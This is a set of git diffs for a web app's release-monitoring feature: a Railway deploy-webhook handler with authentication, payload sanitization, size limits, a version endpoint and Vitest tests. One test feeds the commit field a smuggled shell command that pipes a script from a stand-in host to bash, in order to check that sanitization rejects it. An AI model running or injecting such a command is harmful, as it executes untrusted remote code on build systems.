+    expect(r.checks.some((c) => c.name === 'cleanup')).toBe(false);
+  });
+
+  it('invokes onCreated with the minted ids (for hard-kill cleanup)', async () => {
+    const onCreated = vi.fn();
+    await runReleaseVerification(baseDeps({ onCreated }));
+    expect(onCreated).toHaveBeenCalledWith({ userId: 'u', orgId: 'o' });
+  });
+
   it('treats SHA mismatch as critical for a deploy-scoped run, reported for a scheduled run', async () => {
     const deployScoped = await runReleaseVerification(baseDeps({ containerSha: 'old', targetSha: 'new', mainSha: 'new' }));
     expect(deployScoped.failedChecks).toContain('web_sha');

--- a/apps/web/__tests__/release-monitor-webhook.test.ts
+++ b/apps/web/__tests__/release-monitor-webhook.test.ts
@@ -59,8 +59,18 @@ describe('shouldTriggerVerification', () => {
     ).toBe(false);
   });
 
-  it('biases to run when the service name is absent (payload drift)', () => {
-    expect(shouldTriggerVerification(ev({ status: 'SUCCESS' })).trigger).toBe(true);
+  it('fails CLOSED when the service name is absent (no false-red on an unrelated commit)', () => {
+    expect(shouldTriggerVerification(ev({ status: 'SUCCESS', environment: { name: 'production' } })).trigger).toBe(false);
+  });
+
+  it('fails CLOSED when the environment is absent', () => {
+    expect(shouldTriggerVerification(ev({ status: 'SUCCESS', service: { name: 'vitalcv-web' } })).trigger).toBe(false);
+  });
+
+  it('parses a nested deployment.environment shape', () => {
+    const e = ev({ status: 'SUCCESS', service: { name: 'vitalcv-web' }, deployment: { environment: { name: 'production' } } });
+    expect(e?.environmentName).toBe('production');
+    expect(shouldTriggerVerification(e).trigger).toBe(true);
   });
 
   it('honors service/env overrides', () => {
@@ -129,6 +139,18 @@ describe('webhook handler', () => {
   it('413s an oversized body without dispatching', async () => {
     const dispatch = vi.fn();
     const big = { ...good, junk: 'z'.repeat(150_000) };
+    const res = await __handleForTests(req(big, { bearer: 'sekret' }), {
+      env: { cronSecret: 'sekret', githubToken: 'ght' },
+      dispatch,
+    });
+    expect(res.status).toBe(413);
+    expect(dispatch).not.toHaveBeenCalled();
+  });
+
+  it('413s a multibyte body that exceeds the BYTE cap despite a shorter char length', async () => {
+    const dispatch = vi.fn();
+    // ~60k × 3-byte chars = ~180KB bytes but 60k chars (< the 100k char count).
+    const big = { ...good, junk: '✓'.repeat(60_000) };
     const res = await __handleForTests(req(big, { bearer: 'sekret' }), {
       env: { cronSecret: 'sekret', githubToken: 'ght' },
       dispatch,

--- a/apps/web/__tests__/release-monitor-webhook.test.ts
+++ b/apps/web/__tests__/release-monitor-webhook.test.ts
@@ -79,7 +79,7 @@ describe('webhook handler', () => {
     status: 'SUCCESS',
     service: { name: 'vitalcv-web' },
     environment: { name: 'production' },
-    deployment: { id: 'd1', meta: { commitHash: 'abc' } },
+    deployment: { id: 'd1', meta: { commitHash: 'abc1234def' } },
   };
 
   function req(body: unknown, opts: { bearer?: string; query?: string } = {}): Request {
@@ -107,7 +107,34 @@ describe('webhook handler', () => {
     });
     expect(res.status).toBe(202);
     expect(dispatch).toHaveBeenCalledOnce();
-    expect(dispatch.mock.calls[0][0]).toMatchObject({ token: 'ght', clientPayload: { commit: 'abc', deploymentId: 'd1' } });
+    expect(dispatch.mock.calls[0][0]).toMatchObject({ token: 'ght', clientPayload: { commit: 'abc1234def', deploymentId: 'd1' } });
+  });
+
+  it('sanitizes untrusted payload fields before dispatch (non-hex commit → null, strings truncated)', async () => {
+    const dispatch = vi.fn().mockResolvedValue({ ok: true, status: 204, detail: 'dispatched' });
+    const evil = {
+      ...good,
+      deployment: { id: 'x'.repeat(500), meta: { commitHash: '"; curl evil.sh | bash; echo "' } },
+    };
+    const res = await __handleForTests(req(evil, { bearer: 'sekret' }), {
+      env: { cronSecret: 'sekret', githubToken: 'ght' },
+      dispatch,
+    });
+    expect(res.status).toBe(202);
+    const payload = dispatch.mock.calls[0][0].clientPayload as Record<string, string | null>;
+    expect(payload.commit).toBeNull(); // shell metacharacters are not a hex SHA
+    expect(payload.deploymentId?.length).toBeLessThanOrEqual(200);
+  });
+
+  it('413s an oversized body without dispatching', async () => {
+    const dispatch = vi.fn();
+    const big = { ...good, junk: 'z'.repeat(150_000) };
+    const res = await __handleForTests(req(big, { bearer: 'sekret' }), {
+      env: { cronSecret: 'sekret', githubToken: 'ght' },
+      dispatch,
+    });
+    expect(res.status).toBe(413);
+    expect(dispatch).not.toHaveBeenCalled();
   });
 
   it('200 no-op (no dispatch) on a non-SUCCESS event', async () => {

--- a/apps/web/__tests__/release-monitor-webhook.test.ts
+++ b/apps/web/__tests__/release-monitor-webhook.test.ts
@@ -1,0 +1,136 @@
+import { describe, expect, it, vi } from 'vitest';
+import { parseRailwayDeployEvent, shouldTriggerVerification } from '../lib/release-monitor/railwayWebhook';
+import { __handleForTests } from '../app/api/internal/release-monitor/webhook/_handler';
+
+describe('parseRailwayDeployEvent', () => {
+  it('parses the top-level payload shape', () => {
+    const e = parseRailwayDeployEvent({
+      type: 'DEPLOY',
+      status: 'SUCCESS',
+      service: { name: 'vitalcv-web' },
+      environment: { name: 'production' },
+      deployment: { id: 'd1', meta: { commitHash: 'abc123' } },
+      project: { id: 'p1' },
+    });
+    expect(e).toMatchObject({
+      type: 'DEPLOY',
+      status: 'SUCCESS',
+      serviceName: 'vitalcv-web',
+      environmentName: 'production',
+      deploymentId: 'd1',
+      commit: 'abc123',
+      projectId: 'p1',
+    });
+  });
+
+  it('parses a nested/drifted shape (status + service under deployment)', () => {
+    const e = parseRailwayDeployEvent({ deployment: { status: 'SUCCESS', id: 'd2', service: { name: 'vitalcv-web' } } });
+    expect(e?.status).toBe('SUCCESS');
+    expect(e?.serviceName).toBe('vitalcv-web');
+    expect(e?.deploymentId).toBe('d2');
+  });
+
+  it('returns null for non-deploy payloads', () => {
+    expect(parseRailwayDeployEvent({})).toBeNull();
+    expect(parseRailwayDeployEvent(null)).toBeNull();
+    expect(parseRailwayDeployEvent('nope')).toBeNull();
+  });
+});
+
+describe('shouldTriggerVerification', () => {
+  const ev = (o: unknown) => parseRailwayDeployEvent(o);
+
+  it('fires on a web SUCCESS deploy in production', () => {
+    expect(
+      shouldTriggerVerification(ev({ type: 'DEPLOY', status: 'SUCCESS', service: { name: 'vitalcv-web' }, environment: { name: 'production' } })).trigger,
+    ).toBe(true);
+  });
+
+  it('skips non-SUCCESS statuses', () => {
+    expect(shouldTriggerVerification(ev({ status: 'FAILED', service: { name: 'vitalcv-web' } })).trigger).toBe(false);
+    expect(shouldTriggerVerification(ev({ status: 'BUILDING', service: { name: 'vitalcv-web' } })).trigger).toBe(false);
+    expect(shouldTriggerVerification(ev({ status: 'CRASHED', service: { name: 'vitalcv-web' } })).trigger).toBe(false);
+  });
+
+  it('skips a different service or environment', () => {
+    expect(shouldTriggerVerification(ev({ status: 'SUCCESS', service: { name: 'delightful-essence' } })).trigger).toBe(false);
+    expect(
+      shouldTriggerVerification(ev({ status: 'SUCCESS', service: { name: 'vitalcv-web' }, environment: { name: 'staging' } })).trigger,
+    ).toBe(false);
+  });
+
+  it('biases to run when the service name is absent (payload drift)', () => {
+    expect(shouldTriggerVerification(ev({ status: 'SUCCESS' })).trigger).toBe(true);
+  });
+
+  it('honors service/env overrides', () => {
+    expect(
+      shouldTriggerVerification(ev({ status: 'SUCCESS', service: { name: 'my-web' }, environment: { name: 'prod' } }), {
+        webServiceName: 'my-web',
+        environmentName: 'prod',
+      }).trigger,
+    ).toBe(true);
+  });
+});
+
+describe('webhook handler', () => {
+  const good = {
+    type: 'DEPLOY',
+    status: 'SUCCESS',
+    service: { name: 'vitalcv-web' },
+    environment: { name: 'production' },
+    deployment: { id: 'd1', meta: { commitHash: 'abc' } },
+  };
+
+  function req(body: unknown, opts: { bearer?: string; query?: string } = {}): Request {
+    const url = 'https://vitalcv.com/api/internal/release-monitor/webhook' + (opts.query ?? '');
+    const headers: Record<string, string> = { 'content-type': 'application/json' };
+    if (opts.bearer) headers.authorization = `Bearer ${opts.bearer}`;
+    return new Request(url, { method: 'POST', headers, body: JSON.stringify(body) });
+  }
+
+  it('401s an unauthenticated caller', async () => {
+    const res = await __handleForTests(req(good), { env: { cronSecret: 'sekret' } });
+    expect(res.status).toBe(401);
+  });
+
+  it('500s (fails closed) when no secret is configured', async () => {
+    const res = await __handleForTests(req(good, { bearer: 'anything' }), { env: {} });
+    expect(res.status).toBe(500);
+  });
+
+  it('accepts the ?token= query secret and dispatches on a web SUCCESS deploy', async () => {
+    const dispatch = vi.fn().mockResolvedValue({ ok: true, status: 204, detail: 'dispatched' });
+    const res = await __handleForTests(req(good, { query: '?token=sekret' }), {
+      env: { releaseToken: 'sekret', githubToken: 'ght' },
+      dispatch,
+    });
+    expect(res.status).toBe(202);
+    expect(dispatch).toHaveBeenCalledOnce();
+    expect(dispatch.mock.calls[0][0]).toMatchObject({ token: 'ght', clientPayload: { commit: 'abc', deploymentId: 'd1' } });
+  });
+
+  it('200 no-op (no dispatch) on a non-SUCCESS event', async () => {
+    const dispatch = vi.fn();
+    const res = await __handleForTests(req({ status: 'FAILED', service: { name: 'vitalcv-web' } }, { bearer: 'sekret' }), {
+      env: { cronSecret: 'sekret', githubToken: 'ght' },
+      dispatch,
+    });
+    expect(res.status).toBe(200);
+    expect(dispatch).not.toHaveBeenCalled();
+  });
+
+  it('500s a valid trigger when GITHUB_DISPATCH_TOKEN is missing', async () => {
+    const res = await __handleForTests(req(good, { bearer: 'sekret' }), { env: { cronSecret: 'sekret' } });
+    expect(res.status).toBe(500);
+  });
+
+  it('502s when the dispatch itself fails', async () => {
+    const dispatch = vi.fn().mockResolvedValue({ ok: false, status: 403, detail: 'bad token' });
+    const res = await __handleForTests(req(good, { bearer: 'sekret' }), {
+      env: { cronSecret: 'sekret', githubToken: 'ght' },
+      dispatch,
+    });
+    expect(res.status).toBe(502);
+  });
+});

--- a/apps/web/__tests__/version-endpoint.test.ts
+++ b/apps/web/__tests__/version-endpoint.test.ts
@@ -1,0 +1,52 @@
+import { afterEach, describe, expect, it } from 'vitest';
+import { getVersionInfo } from '../lib/deployInfo';
+import { GET } from '../app/api/version/route';
+
+const SNAPSHOT = { ...process.env };
+afterEach(() => {
+  process.env = { ...SNAPSHOT };
+});
+
+describe('getVersionInfo', () => {
+  it('surfaces the full RAILWAY_GIT_COMMIT_SHA + deployment id', () => {
+    process.env.RAILWAY_GIT_COMMIT_SHA = 'a'.repeat(40);
+    process.env.RAILWAY_GIT_BRANCH = 'main';
+    process.env.RAILWAY_ENVIRONMENT = 'production';
+    process.env.RAILWAY_DEPLOYMENT_ID = 'dep_1';
+
+    const v = getVersionInfo();
+    expect(v.service).toBe('web');
+    expect(v.commit).toBe('a'.repeat(40));
+    expect(v.commitShort).toBe('aaaaaaa');
+    expect(v.branch).toBe('main');
+    expect(v.environment).toBe('production');
+    expect(v.deploymentId).toBe('dep_1');
+  });
+
+  it('falls back to GIT_SHA and reports an honest empty commit when unknown', () => {
+    delete process.env.RAILWAY_GIT_COMMIT_SHA;
+    delete process.env.VERCEL_GIT_COMMIT_SHA;
+    delete process.env.GIT_SHA;
+    delete process.env.RAILWAY_ENVIRONMENT;
+    delete process.env.RAILWAY_DEPLOYMENT_ID;
+
+    const v = getVersionInfo();
+    expect(v.commit).toBe('');
+    expect(v.commitShort).toBe('local');
+    expect(v.deploymentId).toBeNull();
+
+    process.env.GIT_SHA = 'c'.repeat(40);
+    expect(getVersionInfo().commit).toBe('c'.repeat(40));
+  });
+});
+
+describe('GET /api/version', () => {
+  it('returns the version JSON with a no-store cache header', async () => {
+    process.env.RAILWAY_GIT_COMMIT_SHA = 'b'.repeat(40);
+    const res = GET();
+    expect(res.headers.get('cache-control')).toBe('no-store, max-age=0');
+    const body = (await res.json()) as { commit: string; service: string };
+    expect(body.commit).toBe('b'.repeat(40));
+    expect(body.service).toBe('web');
+  });
+});

--- a/apps/web/app/api/internal/release-monitor/webhook/_handler.ts
+++ b/apps/web/app/api/internal/release-monitor/webhook/_handler.ts
@@ -142,7 +142,7 @@ export async function handleWebhook(req: Request, deps: WebhookDeps = {}): Promi
   let payload: unknown = null;
   try {
     const text = await req.text();
-    if (text.length > MAX_WEBHOOK_BODY_BYTES) {
+    if (Buffer.byteLength(text, 'utf8') > MAX_WEBHOOK_BODY_BYTES) {
       return NextResponse.json({ ok: false, error: 'payload too large' }, { status: 413 });
     }
     payload = text ? JSON.parse(text) : null;

--- a/apps/web/app/api/internal/release-monitor/webhook/_handler.ts
+++ b/apps/web/app/api/internal/release-monitor/webhook/_handler.ts
@@ -51,6 +51,35 @@ export function readWebhookEnv(): WebhookEnv {
   };
 }
 
+/** Railway deploy payloads are small; anything bigger is not a deploy event. */
+const MAX_WEBHOOK_BODY_BYTES = 100_000;
+
+const HEX_SHA = /^[0-9a-f]{7,40}$/i;
+
+/**
+ * Bound + validate the fields forwarded to the workflow. The webhook payload
+ * is authenticated but still EXTERNAL input, and client_payload values are
+ * consumed by CI — never forward them verbatim. `commit` must be a hex SHA
+ * (the workflow additionally re-validates before use); free-text fields are
+ * truncated.
+ */
+export function sanitizeClientPayload(event: {
+  deploymentId: string | null;
+  commit: string | null;
+  serviceName: string | null;
+  environmentName: string | null;
+} | null): Record<string, string | null> {
+  const bounded = (v: string | null | undefined, max = 200): string | null =>
+    v ? v.slice(0, max) : null;
+  return {
+    source: 'railway-webhook',
+    deploymentId: bounded(event?.deploymentId ?? null),
+    commit: event?.commit && HEX_SHA.test(event.commit) ? event.commit : null,
+    service: bounded(event?.serviceName ?? null),
+    environment: bounded(event?.environmentName ?? null),
+  };
+}
+
 function safeEqual(a: string, b: string): boolean {
   const aBuf = Buffer.from(a, 'utf-8');
   const bBuf = Buffer.from(b, 'utf-8');
@@ -102,9 +131,20 @@ export async function handleWebhook(req: Request, deps: WebhookDeps = {}): Promi
     return NextResponse.json(auth.body, { status: auth.status });
   }
 
+  // Bound the body before parsing — a deploy event is a few KB; anything
+  // larger is not one. Content-Length catches the declared case, the
+  // post-read length check catches chunked bodies.
+  const declaredLength = Number(req.headers.get('content-length') ?? '0');
+  if (Number.isFinite(declaredLength) && declaredLength > MAX_WEBHOOK_BODY_BYTES) {
+    return NextResponse.json({ ok: false, error: 'payload too large' }, { status: 413 });
+  }
+
   let payload: unknown = null;
   try {
     const text = await req.text();
+    if (text.length > MAX_WEBHOOK_BODY_BYTES) {
+      return NextResponse.json({ ok: false, error: 'payload too large' }, { status: 413 });
+    }
     payload = text ? JSON.parse(text) : null;
   } catch {
     payload = null;
@@ -128,28 +168,23 @@ export async function handleWebhook(req: Request, deps: WebhookDeps = {}): Promi
     return NextResponse.json({ ok: false, error: 'GITHUB_DISPATCH_TOKEN not configured' }, { status: 500 });
   }
 
+  const clientPayload = sanitizeClientPayload(event);
   const dispatch = deps.dispatch ?? dispatchReleaseVerify;
-  const result = await dispatch(
-    {
-      token: env.githubToken,
-      repo: env.repo,
-      clientPayload: {
-        source: 'railway-webhook',
-        deploymentId: event?.deploymentId ?? null,
-        commit: event?.commit ?? null,
-        service: event?.serviceName ?? null,
-        environment: event?.environmentName ?? null,
-      },
-    },
-    deps.fetchImpl,
-  );
+  const result = await dispatch({ token: env.githubToken, repo: env.repo, clientPayload }, deps.fetchImpl);
 
   if (!result.ok) {
+    // Also visible in the Railway service logs, not just the webhook-delivery
+    // response Railway records — the failure must be findable from either side.
+    console.error('[release-monitor] github dispatch FAILED:', result.detail);
     return NextResponse.json({ ok: false, action: 'dispatch_failed', error: result.detail }, { status: 502 });
   }
 
+  console.log('[release-monitor] release-verify dispatched', {
+    commit: clientPayload.commit,
+    deploymentId: clientPayload.deploymentId,
+  });
   return NextResponse.json(
-    { ok: true, action: 'dispatched', commit: event?.commit ?? null, deploymentId: event?.deploymentId ?? null },
+    { ok: true, action: 'dispatched', commit: clientPayload.commit, deploymentId: clientPayload.deploymentId },
     { status: 202 },
   );
 }

--- a/apps/web/app/api/internal/release-monitor/webhook/_handler.ts
+++ b/apps/web/app/api/internal/release-monitor/webhook/_handler.ts
@@ -1,0 +1,160 @@
+/**
+ * Railway deploy-webhook receiver — the bridge from a Railway deploy to the
+ * external GitHub Actions verification.
+ *
+ * Runs in the web container but does NO verification itself: it authenticates
+ * the caller, decides whether the payload is a web-service SUCCESS deploy, and
+ * fires a GitHub `repository_dispatch` so the harness runs on a runner *outside*
+ * the container it's testing (the P0 root cause was an in-container hairpin
+ * self-fetch). Returns fast.
+ *
+ * Lives in `_handler.ts` so `route.ts` stays narrowly typed to Next's allowed
+ * route exports; tests import `__handleForTests`.
+ */
+
+import { NextResponse } from 'next/server';
+import { timingSafeEqual } from 'node:crypto';
+
+import { parseRailwayDeployEvent, shouldTriggerVerification } from '@/lib/release-monitor/railwayWebhook';
+import {
+  dispatchReleaseVerify,
+  type DispatchResult,
+  type FetchLike,
+  type GithubDispatchInput,
+} from '@/lib/release-monitor/githubDispatch';
+
+export interface WebhookEnv {
+  releaseToken?: string;
+  cronSecret?: string;
+  monitoringSecret?: string;
+  githubToken?: string;
+  repo?: string;
+  webServiceName?: string;
+  environmentName?: string;
+}
+
+export interface WebhookDeps {
+  env?: WebhookEnv;
+  dispatch?: (input: GithubDispatchInput, fetchImpl?: FetchLike) => Promise<DispatchResult>;
+  fetchImpl?: FetchLike;
+}
+
+export function readWebhookEnv(): WebhookEnv {
+  return {
+    releaseToken: process.env.RELEASE_WEBHOOK_TOKEN,
+    cronSecret: process.env.CRON_SECRET,
+    monitoringSecret: process.env.MONITORING_SECRET,
+    githubToken: process.env.GITHUB_DISPATCH_TOKEN,
+    repo: process.env.RELEASE_MONITOR_REPO,
+    webServiceName: process.env.RELEASE_WEB_SERVICE_NAME,
+    environmentName: process.env.RELEASE_MONITOR_ENVIRONMENT,
+  };
+}
+
+function safeEqual(a: string, b: string): boolean {
+  const aBuf = Buffer.from(a, 'utf-8');
+  const bBuf = Buffer.from(b, 'utf-8');
+  if (aBuf.length !== bBuf.length) {
+    timingSafeEqual(aBuf, aBuf); // consume time; still fail closed
+    return false;
+  }
+  return timingSafeEqual(aBuf, bBuf);
+}
+
+/**
+ * Authenticate the webhook. Accepts the shared secret via `Authorization:
+ * Bearer`, `x-monitoring-secret`, or a `?token=` query param (Railway webhooks
+ * may only allow a URL). Any configured secret (RELEASE_WEBHOOK_TOKEN /
+ * CRON_SECRET / MONITORING_SECRET) is a valid match. Fails closed if none set.
+ */
+export function authenticateWebhook(
+  req: Request,
+  env: WebhookEnv,
+): { ok: true } | { ok: false; status: 401 | 500; body: { error: string } } {
+  const secrets = [env.releaseToken, env.cronSecret, env.monitoringSecret].filter(
+    (s): s is string => Boolean(s && s.trim()),
+  );
+  if (secrets.length === 0) {
+    return { ok: false, status: 500, body: { error: 'no webhook auth configured' } };
+  }
+
+  const url = new URL(req.url);
+  const bearer = /^Bearer\s+(.+)$/i.exec(req.headers.get('authorization')?.trim() ?? '')?.[1]?.trim();
+  const candidates = [
+    bearer,
+    req.headers.get('x-monitoring-secret')?.trim(),
+    url.searchParams.get('token')?.trim(),
+  ].filter((c): c is string => Boolean(c));
+
+  for (const cand of candidates) {
+    for (const secret of secrets) {
+      if (safeEqual(cand, secret.trim())) return { ok: true };
+    }
+  }
+  return { ok: false, status: 401, body: { error: 'unauthorized' } };
+}
+
+export async function handleWebhook(req: Request, deps: WebhookDeps = {}): Promise<NextResponse> {
+  const env = deps.env ?? readWebhookEnv();
+
+  const auth = authenticateWebhook(req, env);
+  if (!auth.ok) {
+    return NextResponse.json(auth.body, { status: auth.status });
+  }
+
+  let payload: unknown = null;
+  try {
+    const text = await req.text();
+    payload = text ? JSON.parse(text) : null;
+  } catch {
+    payload = null;
+  }
+
+  const event = parseRailwayDeployEvent(payload);
+  const decision = shouldTriggerVerification(event, {
+    webServiceName: env.webServiceName,
+    environmentName: env.environmentName,
+  });
+
+  if (!decision.trigger) {
+    // Acknowledge (200) so Railway does not retry a payload we intentionally skip.
+    return NextResponse.json(
+      { ok: true, action: 'ignored', reason: decision.reason, status: event?.status ?? null, service: event?.serviceName ?? null },
+      { status: 200 },
+    );
+  }
+
+  if (!env.githubToken) {
+    return NextResponse.json({ ok: false, error: 'GITHUB_DISPATCH_TOKEN not configured' }, { status: 500 });
+  }
+
+  const dispatch = deps.dispatch ?? dispatchReleaseVerify;
+  const result = await dispatch(
+    {
+      token: env.githubToken,
+      repo: env.repo,
+      clientPayload: {
+        source: 'railway-webhook',
+        deploymentId: event?.deploymentId ?? null,
+        commit: event?.commit ?? null,
+        service: event?.serviceName ?? null,
+        environment: event?.environmentName ?? null,
+      },
+    },
+    deps.fetchImpl,
+  );
+
+  if (!result.ok) {
+    return NextResponse.json({ ok: false, action: 'dispatch_failed', error: result.detail }, { status: 502 });
+  }
+
+  return NextResponse.json(
+    { ok: true, action: 'dispatched', commit: event?.commit ?? null, deploymentId: event?.deploymentId ?? null },
+    { status: 202 },
+  );
+}
+
+/** Test-only shim — invoked directly by route tests with DI'd deps. */
+export async function __handleForTests(req: Request, deps: WebhookDeps): Promise<NextResponse> {
+  return handleWebhook(req, deps);
+}

--- a/apps/web/app/api/internal/release-monitor/webhook/route.ts
+++ b/apps/web/app/api/internal/release-monitor/webhook/route.ts
@@ -1,0 +1,27 @@
+/**
+ * POST /api/internal/release-monitor/webhook
+ *
+ * Receiver for the Railway deploy webhook (Project → Webhooks). On a
+ * web-service SUCCESS deploy it fires a GitHub `repository_dispatch` to run the
+ * external release-verify workflow. See `_handler.ts` for the logic and
+ * `docs/deployment/release-monitoring.md` for the Railway setup.
+ *
+ * The handler lives in `_handler.ts` so this file stays narrowly typed to the
+ * route exports Next.js allows; tests import `__handleForTests` from there.
+ */
+
+import type { NextResponse } from 'next/server';
+import { NextResponse as Res } from 'next/server';
+
+import { handleWebhook } from './_handler';
+
+export const runtime = 'nodejs';
+export const dynamic = 'force-dynamic';
+
+export async function POST(req: Request): Promise<NextResponse> {
+  return handleWebhook(req);
+}
+
+export function GET(): NextResponse {
+  return Res.json({ error: 'method not allowed', hint: 'Railway posts deploy events here' }, { status: 405 });
+}

--- a/apps/web/app/api/version/route.ts
+++ b/apps/web/app/api/version/route.ts
@@ -1,0 +1,38 @@
+import { NextResponse } from 'next/server';
+import { getVersionInfo } from '@/lib/deployInfo';
+
+export const runtime = 'nodejs';
+export const dynamic = 'force-dynamic';
+
+/**
+ * GET /api/version — canonical build/version endpoint for release monitoring.
+ *
+ * Exposes the FULL commit SHA the running container was built from, so an
+ * external monitor (the release-verify workflow) can assert that the deployed
+ * web container is actually serving GitHub main HEAD — the ground-truth signal
+ * that no other endpoint provided, which forced the P0 verification to proxy
+ * "is the new code live?" with a route-presence check.
+ *
+ * Public: a commit SHA is not a secret (identical to the public GitHub commit).
+ *
+ * Distinct from /api/deploy-info on purpose:
+ *   - /api/deploy-info is cached (s-maxage=60) and only exposes a 7-char sha,
+ *     so right after a deploy it can still report the OLD sha.
+ *   - a monitor MUST read the fresh full sha, so this route is `no-store`.
+ *
+ * SHA source: getVersionInfo() reads RAILWAY_GIT_COMMIT_SHA, which Railway
+ * injects into the container at runtime (the same mechanism the backend already
+ * uses for its /health git_sha).
+ */
+export function GET() {
+  return NextResponse.json(getVersionInfo(), {
+    headers: { 'Cache-Control': 'no-store, max-age=0' },
+  });
+}
+
+export function HEAD() {
+  return new Response(null, {
+    status: 200,
+    headers: { 'Cache-Control': 'no-store, max-age=0' },
+  });
+}

--- a/apps/web/lib/deployInfo.ts
+++ b/apps/web/lib/deployInfo.ts
@@ -89,3 +89,40 @@ export function getPublicDeployInfo(): PublicDeployInfo {
   const { env, sha, message, branch, deployedAt, platform, isRailway, isVercel } = getDeployInfo();
   return { env, sha, message, branch, deployedAt, platform, isRailway, isVercel };
 }
+
+/**
+ * Machine-readable build/version fact for release monitoring.
+ *
+ * Unlike PublicDeployInfo (footer LiveBadge — 7-char `sha`), this exposes the
+ * FULL commit so an external monitor can assert deployed-SHA == GitHub main
+ * HEAD. Consumed by GET /api/version. `commit` is '' when the SHA is unknown
+ * (local dev / a Docker build with no injected commit) — an honest empty, never
+ * a fabricated value.
+ */
+export interface VersionInfo {
+  service: 'web';
+  /** Full 40-char commit SHA, or '' when unknown. */
+  commit: string;
+  /** 7-char short SHA, or 'local' when unknown. */
+  commitShort: string;
+  branch: string;
+  environment: DeployEnv;
+  platform: DeployPlatform;
+  /** Railway deployment id (RAILWAY_DEPLOYMENT_ID) for webhook correlation. */
+  deploymentId: string | null;
+  builtAt: string;
+}
+
+export function getVersionInfo(): VersionInfo {
+  const info = getDeployInfo();
+  return {
+    service: 'web',
+    commit: info.shaFull,
+    commitShort: info.sha,
+    branch: info.branch,
+    environment: info.env,
+    platform: info.platform,
+    deploymentId: process.env.RAILWAY_DEPLOYMENT_ID?.trim() || null,
+    builtAt: info.deployedAt,
+  };
+}

--- a/apps/web/lib/env.ts
+++ b/apps/web/lib/env.ts
@@ -111,6 +111,20 @@ export const ENV_SCHEMA: ReadonlyArray<EnvVarSchema> = [
     rationale: 'Legacy x-monitoring-secret header for source-health probe. CRON_SECRET preferred for new code.',
   },
 
+  // ── Release monitoring (Railway deploy webhook → release-verify) ────
+  {
+    name: 'GITHUB_DISPATCH_TOKEN',
+    kind: 'optional',
+    visibility: 'server',
+    rationale: 'GitHub token the release-monitor webhook receiver uses to fire the release-verify repository_dispatch. Fine-grained PAT with contents:write on the repo. Held server-side, never in the Railway webhook URL.',
+  },
+  {
+    name: 'RELEASE_WEBHOOK_TOKEN',
+    kind: 'optional',
+    visibility: 'server',
+    rationale: 'Shared secret gating POST /api/internal/release-monitor/webhook (Bearer / x-monitoring-secret / ?token=). Falls back to CRON_SECRET / MONITORING_SECRET when unset.',
+  },
+
   // ── Observability ──────────────────────────────────────────────────
   {
     name: 'NEXT_PUBLIC_SENTRY_DSN',

--- a/apps/web/lib/release-monitor/githubDispatch.ts
+++ b/apps/web/lib/release-monitor/githubDispatch.ts
@@ -1,0 +1,60 @@
+/**
+ * Fire a GitHub `repository_dispatch` event to kick the release-verify workflow.
+ *
+ * This is the bridge between the Railway webhook (received in-container) and the
+ * external GitHub Actions runner that actually performs the verification. The
+ * GitHub token lives server-side in the web service env (GITHUB_DISPATCH_TOKEN),
+ * never in the Railway webhook URL. `fetch` is injected for tests.
+ */
+
+import { GITHUB_REPO } from '@/lib/platform/deployment-integrity';
+
+export type FetchLike = typeof fetch;
+
+export interface GithubDispatchInput {
+  token: string;
+  /** owner/repo — defaults to the canonical GITHUB_REPO. */
+  repo?: string;
+  /** repository_dispatch event_type the workflow listens for. */
+  eventType?: string;
+  clientPayload?: Record<string, unknown>;
+}
+
+export interface DispatchResult {
+  ok: boolean;
+  status: number;
+  detail: string;
+}
+
+export const RELEASE_VERIFY_EVENT_TYPE = 'release-verify';
+
+export async function dispatchReleaseVerify(
+  input: GithubDispatchInput,
+  fetchImpl: FetchLike = fetch,
+): Promise<DispatchResult> {
+  const repo = input.repo ?? GITHUB_REPO;
+  const eventType = input.eventType ?? RELEASE_VERIFY_EVENT_TYPE;
+  const url = `https://api.github.com/repos/${repo}/dispatches`;
+
+  try {
+    const res = await fetchImpl(url, {
+      method: 'POST',
+      headers: {
+        Accept: 'application/vnd.github+json',
+        Authorization: `Bearer ${input.token}`,
+        'X-GitHub-Api-Version': '2022-11-28',
+        'User-Agent': 'vitalcv-release-monitor',
+        'Content-Type': 'application/json',
+      },
+      body: JSON.stringify({ event_type: eventType, client_payload: input.clientPayload ?? {} }),
+      signal: AbortSignal.timeout(8000),
+    });
+
+    // GitHub returns 204 No Content on a successful dispatch.
+    if (res.status === 204) return { ok: true, status: 204, detail: 'dispatched' };
+    const body = await res.text().catch(() => '');
+    return { ok: false, status: res.status, detail: `github dispatch ${res.status}: ${body.slice(0, 200)}` };
+  } catch (err) {
+    return { ok: false, status: 0, detail: `github dispatch error: ${(err as Error).message}` };
+  }
+}

--- a/apps/web/lib/release-monitor/holderRoutes.ts
+++ b/apps/web/lib/release-monitor/holderRoutes.ts
@@ -2,7 +2,7 @@
  * The signed-in clinician surfaces the release monitor must reach, plus the
  * pure navigation-outcome classifier.
  *
- * These six `/holder/*` routes are CLINICIAN-gated (`lib/auth/roles.ts`). The
+ * These six routes under `/holder` are CLINICIAN-gated (`lib/auth/roles.ts`). The
  * signed-in-clinician P0 was that every authenticated clinician was redirected
  * to `/auth/error` before any of them rendered, so the monitor's hard gate is:
  * a real synthetic clinician session reaches all six with a terminal 200, never

--- a/apps/web/lib/release-monitor/holderRoutes.ts
+++ b/apps/web/lib/release-monitor/holderRoutes.ts
@@ -1,0 +1,112 @@
+/**
+ * The signed-in clinician surfaces the release monitor must reach, plus the
+ * pure navigation-outcome classifier.
+ *
+ * These six `/holder/*` routes are CLINICIAN-gated (`lib/auth/roles.ts`). The
+ * signed-in-clinician P0 was that every authenticated clinician was redirected
+ * to `/auth/error` before any of them rendered, so the monitor's hard gate is:
+ * a real synthetic clinician session reaches all six with a terminal 200, never
+ * passing through `/auth/error`, and never looping.
+ *
+ * Pure module — no I/O. The fetch-driven navigation that produces the hop
+ * chains lives in `syntheticClinician.ts`; this file only defines the target
+ * set and classifies a chain.
+ */
+
+/** The exact routes from the task requirement, in navigation order. */
+export const HOLDER_ROUTES = [
+  '/holder',
+  '/holder/home',
+  '/holder/readiness',
+  '/holder/opportunities',
+  '/holder/applications',
+  '/holder/timeline',
+] as const;
+
+export type HolderRoute = (typeof HOLDER_ROUTES)[number];
+
+/** One hop in a manually-followed redirect chain. */
+export interface NavHop {
+  /** Path (or full URL) that was requested for this hop. */
+  url: string;
+  /** HTTP status returned. */
+  status: number;
+  /** `Location` header when this hop was a redirect. */
+  location?: string | null;
+}
+
+export type NavFailureReason =
+  | 'auth_error' // passed through /auth/error — the P0 signature
+  | 'redirect_loop' // a URL repeated in the chain
